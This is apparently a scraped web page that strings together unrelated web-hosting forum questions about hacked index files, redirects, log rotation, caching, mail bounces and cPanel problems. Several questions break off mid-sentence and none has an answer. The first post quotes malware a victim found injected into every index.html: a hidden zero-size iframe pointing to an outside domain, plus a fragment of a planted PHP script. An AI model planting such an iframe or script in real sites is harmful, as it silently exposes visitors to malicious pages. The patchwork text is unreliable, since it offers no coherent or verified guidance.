My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code: ><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ --> Also a line.php with the following code
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?> So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
how to rename access logs according to Week Number?
I notice that 1&1 do this, producing a file like "access.log.31.gz". I'd like the access log to be in this format: access_log_[domain-name]_[Week-Number].gz, or if domain-name is not possible: access_log_[Week-Number].gz
Here's my current logrotate script for access_log:
I am setting up Expires headers for my site. The site allows users to upload photos of themselves. The photos are stored as <user id number>.jpeg. I want these to be cached, but updated when the user uploads a new photo. From what I understand, new browsers use ETags to make sure this happens (since if they upload a new file, the inode and/or mtime will change). However for older browsers, I plan to add ?file-mtime to the end of the file name. This should allow caching but it will change when the user uploads a new image. Will the cause any technical problems with caches that would not be a problem if I changed the filename to be user_id.mtime.jpeg when the user uploads the file? The trade-off is that if I just append ?file-mtime to the end of the filename, I don't have to track these images in a database or use file globs (cpu-expensive for large directories) to find the filename to output.
In previous thread we made few manual transfer of our domains.
We also made some automated migration of few domains/sites using Web Host Manager's Copy an account from another server feature.
All the files and other settings were properly transferred from old server to new server, but only the mysql database is not visible on new server. I am unsure if the same got copied to new server.
since 2 days, all my emails to addresses @yahoo.*, scglobal.com and many others use Yahoo email services are bounced back with error like:
reason: 554 Message not allowed - UP Email not accepted for policy reasons. Please visit [url]
I visited the page and from this to other until I found this page:
[url]
in conclusion, nothing wrong in mail server, its in message content! .. after spending long hours looking for what I'm saying wrong in my emails ...
I found the bad word .. its 2mhost.com in the SAME message, if I add word 2mhost.com to it, it will bounce back in a second, if I removed it the message go fine.
this of course includes 2mhost.com that appear in URLs, simply .. I'm now can't spell my domain name in my messages
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
I am trying to develop a new way to secure my server. But I couldn't find any way i can search for a specific word on the whole mysql server ( All databases )..
So far my upgrade to 12 has been very smooth but one items that I can't seem to find an answer on is I do not have any applications (including Wordpress) available to users to install. I want this only set and allowed and installed by me (the Admin). If I log in as a user only I can install WP and don't want my customers doing this without talking to me first.
Am I missing a place to shut this down or uncheck to allow this to be installed?
I created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name. The file is named index.htm and consist only the mock up image.
The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though. The only difference I have noticed that after the refreshment,
i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.
after week when my server upgrade the cpanel automatic i got infected in all index files like index.html and index.php and index.asp and any index with any extinstion and this is the code in all files
Code: <iframe src=[url]
and when i delete this code it come again in all index files
i am in really trouble with my clients and i want to know how can i fix this thing and never come back again
One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at [url]
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
I don't know what's wrong with the server where the wordpress site is hosted. But in the permalinks, index.php must be included in the permalinks (more information here:[url]
What can be fixed in the server so that wordpress permalinks will work correctly?
I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )